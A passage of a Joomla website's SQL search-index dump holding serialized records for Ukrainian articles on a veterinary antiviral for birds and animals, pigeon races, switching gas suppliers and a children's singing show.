09:44:17\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:2:\"18\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:44:\"2499:lozeval-protivovirusnij-preparat-100-ml\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:88:\"/index.php/holuby/informatsiia-holubivnykam/2499-lozeval-protivovirusnij-preparat-100-ml\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2499\";s:5:\"route\";s:99:\"index.php?option=com_content&view=article&id=2499:lozeval-protivovirusnij-preparat-100-ml&catid=135\";s:5:\"title\";s:64:\"Лозеваль противовірусний препарат\";s:11:\"description\";s:4288:\" Лозеваль противовирусный, 100 мл - препарат для профилактики и лечения вирусных и бактериальных заболеваний. Повышает резистентность организма у животных и птиц. Описание и состав: раствор для внутреннего, наружного и аэрозольного применения.Фасовка: флакон 100 мл. Фармакологические свойства: Противовирусное действие за счет ингибирования внутриклеточной репродукции вирусов, обладает бактериостатическими и бактерицидными свойствами по отношению к грамположительной и грамотрицательной микрофлоре. Лозеваль повышает резистентность организма животных и птиц за счет стимулирования клеточного и гуморального иммунитета, усиления синтеза моконуклеаров и повышения уровня лизоцима. Применение: Назначение Доза Особенности Вирусные инфекции: аденовирусная инфекция, парагрипп-3, ринотрахеит, болезнь Ньюкасла, болезнь Марека, инфекционный бронхит кур, чума плотоядных, парвовирусный энтерит собак, панлейкемия кошек 1-2 мл на 10 кг массы, 1-2 раза в сутки Препарат задается с кормом или выпаивается, в течение 5 дней. После З-х дневного перерыва, при необходимости, курс повторяют. Спрофилактической целью препарат задается в тех же дозах 1 раз в день, 2 дня подряд с недельным интервалом Бактериальные инфекции животных и птиц: паратиф, колибактериоз, стрептококкоз, стафилококкоз, пастереллез 1-2 мл на 10 кг массы, 1 раз в сутки Задается в течение 5 дней. После 3-х дневного перерыва, при необходимости, курс повторяют Респираторные заболевания препарат разводят 1:1 в 5% растворе глюкозы Смазывают или закапывают в носовые ходы. Применяется для аэрозольных обработок помещения, в концентрации 1-2 мл/м3 с экспозицией 45 мин Кожные заболевания: дерматит, экзема, рожа, ожоги, гнойные раны пораженные места смазывают 2-3 раза в день применяют наружно до полного выздоровления Отиты препарат разводят 1:1 в 960 спирте или закапывают в уши по 2-3 капли (без разведения) 2 раза в день в течение 4-5 дней В акушерско-гинекологической практике вводится внутриматочно в разведении 1:1 с подсолнечным маслом или в дозе 1 мл на 10 кг массы тела (без разведения). При маститах препарат втирается в пораженные доли 3-4 раза в день до полного выздоровления в течение 4-5дней При кастрации и косметических операциях раненая поверхность смазывается 2-3 раза в день применяют до заживления раны Побочные действия: в рекомендуемых дозах не оказывает. Противопоказания: не выявлено. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-02-03 09:19:56\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-02-03 09:19:56\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4799,'index.php?option=com_content&view=article&id=2500','index.php?option=com_content&view=article&id=2500:pershi-poshtovi-2021-roku&catid=126','Перші поштові 2021 року',' ','2021-02-12 15:56:08','b09c8372ac999ea3cc76201fbc2b0c71',1,1,1,'*','2021-02-12 13:56:08','0000-00-00 00:00:00','2021-02-12 13:56:08','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2500\";s:5:\"alias\";s:25:\"pershi-poshtovi-2021-roku\";s:7:\"summary\";s:296:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/f-YZMZAx7ko\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-02-12 13:56:08\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:30:\"2500:pershi-poshtovi-2021-roku\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:57:\"/index.php/holuby/poshtovi/2500-pershi-poshtovi-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2500\";s:5:\"route\";s:85:\"index.php?option=com_content&view=article&id=2500:pershi-poshtovi-2021-roku&catid=126\";s:5:\"title\";s:39:\"Перші поштові 2021 року\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-02-12 13:56:08\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-02-12 13:56:08\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4803,'index.php?option=com_content&view=article&id=2501','index.php?option=com_content&view=article&id=2501:gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae&catid=8','«Газова грамота»: як змінити постачальника газу і скільки часу це займає?',' Із відкриттям ринку газу українці отримали можливість змінити постачальника «блакитного палива» легко і швидко. Це можна зробити навіть онлайн. Достатньо лише обрати нову компанію й подати до неї заяву та мінімальний пакет документів. Усіма бюрократичними процесами опікуватиметься постачальник газу, з яким споживач хоче укласти договір. Процес зміни постачальника газу може займати близько трьох тижнів. Але зазвичай перехід відбувається набагато швидше. У нашому ролику ви знайдете покрокову інструкцію, як змінити постачальника газу легко і без зайвого клопоту. https://gazpravda.com.ua/https://gazpravda.com.ua/ ','2021-02-12 16:01:47','26f706afa1b1cf3be72f78b99335c3d4',1,1,1,'*','2021-02-12 14:00:39','0000-00-00 00:00:00','2021-02-12 14:00:39','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2501\";s:5:\"alias\";s:71:\"gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae\";s:7:\"summary\";s:1523:\"<!--StartFragment--><p>Із відкриттям ринку газу українці отримали можливість змінити постачальника «блакитного палива» легко і швидко. Це можна зробити навіть онлайн.</p><p>Достатньо лише обрати нову компанію й подати до неї заяву та мінімальний пакет документів.</p><p>Усіма бюрократичними процесами опікуватиметься постачальник газу, з яким споживач хоче укласти договір.</p><p>Процес зміни постачальника газу може займати близько трьох тижнів. Але зазвичай перехід відбувається набагато швидше.</p><p>У нашому ролику ви знайдете покрокову інструкцію, як змінити постачальника газу легко і без зайвого клопоту.</p><p><a href=\"https://gazpravda.com.ua/\">https://gazpravda.com.ua/https://gazpravda.com.ua/</a><br></p><p><br></p><!--EndFragment--><p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/s5xvBHiBLlg\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-02-12 14:01:47\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"4\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:76:\"2501:gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:98:\"/index.php/8-novini-2/2501-gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2501\";s:5:\"route\";s:129:\"index.php?option=com_content&view=article&id=2501:gazova-gramota-yak-zminiti-postachalnika-gazu-i-skilki-chasu-tse-zajmae&catid=8\";s:5:\"title\";s:134:\"«Газова грамота»: як змінити постачальника газу і скільки часу це займає?\";s:11:\"description\";s:1099:\" Із відкриттям ринку газу українці отримали можливість змінити постачальника «блакитного палива» легко і швидко. Це можна зробити навіть онлайн. Достатньо лише обрати нову компанію й подати до неї заяву та мінімальний пакет документів. Усіма бюрократичними процесами опікуватиметься постачальник газу, з яким споживач хоче укласти договір. Процес зміни постачальника газу може займати близько трьох тижнів. Але зазвичай перехід відбувається набагато швидше. У нашому ролику ви знайдете покрокову інструкцію, як змінити постачальника газу легко і без зайвого клопоту. https://gazpravda.com.ua/https://gazpravda.com.ua/ \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-02-12 14:00:39\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-02-12 14:00:39\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4804,'index.php?option=com_content&view=article&id=2502','index.php?option=com_content&view=article&id=2502:krashchi-vistupi-ditej-v-golos-diti&catid=8','Кращі виступи дітей в Голос Діти ',' ','2021-02-20 19:01:50','92fedb00573987cc1d3a27540b39ec19',1,1,1,'*','2021-02-20 17:01:50','0000-00-00 00:00:00','2021-02-20 17:01:50','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2502\";s:5:\"alias\";s:35:\"krashchi-vistupi-ditej-v-golos-diti\";s:7:\"summary\";s:296:\"<p><span 